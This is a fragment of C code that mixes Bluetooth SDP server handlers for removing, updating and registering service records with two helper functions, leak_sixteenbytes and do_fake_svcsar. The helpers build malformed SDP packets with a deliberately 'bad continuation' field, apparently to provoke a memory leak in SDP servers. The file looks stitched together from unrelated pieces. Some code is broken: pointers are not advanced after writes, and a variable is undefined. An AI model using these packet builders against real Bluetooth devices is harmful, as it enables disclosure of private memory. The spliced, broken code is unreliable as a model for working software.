static void leak_sixteenbytes(uint8_t *pkt)
{
bt_put_be16(8, pkt);
bt_put_be16(4, pkt);
bt_put_be32(0xAAAAAAAA, pkt);
bt_put_be32(0xAAAAAAAB, pkt);
bt_put_be32(0xAAAAAAAC, pkt);
bt_put_be32(0xAAAAAAAD, pkt);
/* Here is the continuation */
*pkt = 16;
pkt++;
}
/*
* Remove a registered service record
*/
int service_remove_req(sdp_req_t *req, sdp_buf_t *rsp)
{
uint8_t *p = req->buf + sizeof(sdp_pdu_hdr_t);
uint32_t handle = bt_get_be32(p);
sdp_record_t *rec;
int status = 0;
/* extract service record handle */
rec = sdp_record_find(handle);
if (rec) {
sdp_svcdb_collect(rec);
status = sdp_record_remove(handle);
sdp_record_free(rec);
if (status == 0)
update_db_timestamp();
} else {
status = SDP_INVALID_RECORD_HANDLE;
SDPDBG("Could not find record : 0x%x", handle);
}
p = rsp->data;
bt_put_be16(status, p);
rsp->data_size = sizeof(uint16_t);
return status;
}
static size_t do_fake_svcsar(uint8_t *pkt)
{
int i;
int cnt = 8 + (count * 4);
uint8_t *start = pkt;
/* list byte count */
bt_put_be16(cnt, pkt);pkt += 2;
for (i = 0; i < cnt; i++) {
*pkt = 0xAA;
pkt++;
}
/* bad continuation */
*pkt = 16;
pkt++;
printf("%zu\n", pkt-start);
return (size_t) (pkt - start);
}
/*
* Update a service record
*/
int service_update_req(sdp_req_t *req, sdp_buf_t *rsp)
{
sdp_record_t *orec, *nrec;
int status = 0, scanned = 0;
uint8_t *p = req->buf + sizeof(sdp_pdu_hdr_t);
int bufsize = req->len - sizeof(sdp_pdu_hdr_t);
uint32_t handle = bt_get_be32(p);
SDPDBG("Svc Rec Handle: 0x%x", handle);
p += sizeof(uint32_t);
bufsize -= sizeof(uint32_t);
orec = sdp_record_find(handle);
SDPDBG("SvcRecOld: %p", orec);
if (!orec) {
status = SDP_INVALID_RECORD_HANDLE;
goto done;
}
nrec = extract_pdu_server(BDADDR_ANY, p, bufsize, handle, &scanned);
if (!nrec) {
status = SDP_INVALID_SYNTAX;
goto done;
}
assert(nrec == orec);
update_db_timestamp();
done:
p = rsp->data;
bt_put_be16(status, p);
rsp->data_size = sizeof(uint16_t);
return status;
}
/*
* Add the newly created service record to the service repository
*/
int service_register_req(sdp_req_t *req, sdp_buf_t *rsp)
{
int scanned = 0;
sdp_data_t *handle;
uint8_t *p = req->buf + sizeof(sdp_pdu_hdr_t);
int bufsize = req->len - sizeof(sdp_pdu_hdr_t);
sdp_record_t *rec;
req->flags = *p++;
if (req->flags & SDP_DEVICE_RECORD) {
bacpy(&req->device, (bdaddr_t *) p);
p += sizeof(bdaddr_t);
bufsize -= sizeof(bdaddr_t);
}
/* save image of PDU: we need it when clients request this attribute */
rec = extract_pdu_server(&req->device, p, bufsize, 0xffffffff, &scanned);
if (!rec)
goto invalid;
if (rec->handle == 0xffffffff) {
rec->handle = sdp_next_handle();
if (rec->handle < 0x10000) {
sdp_record_free(rec);
goto invalid;
}
} else {
if (sdp_record_find(rec->handle)) {
/* extract_pdu_server will add the record handle
* if it is missing. So instead of failing, skip
* the record adding to avoid duplication. */
goto success;
}
}
sdp_record_add(&req->device, rec);
if (!(req->flags & SDP_RECORD_PERSIST))
sdp_svcdb_set_collectable(rec, req->sock);
handle = sdp_data_alloc(SDP_UINT32, &rec->handle);
sdp_attr_replace(rec, SDP_ATTR_RECORD_HANDLE, handle);
success:
/* if the browse group descriptor is NULL,
* ensure that the record belongs to the ROOT group */
if (sdp_data_get(rec, SDP_ATTR_BROWSE_GRP_LIST) == NULL) {
uuid_t uuid;
sdp_uuid16_create(&uuid, PUBLIC_BROWSE_GROUP);
sdp_pattern_add_uuid(rec, &uuid);
}
update_db_timestamp();
/* Build a rsp buffer */
bt_put_be32(rec->handle, rsp->data);
rsp->data_size = sizeof(uint32_t);
return 0;
invalid:
bt_put_be16(SDP_INVALID_SYNTAX, rsp->data);
rsp->data_size = sizeof(uint16_t);
return -1;
}
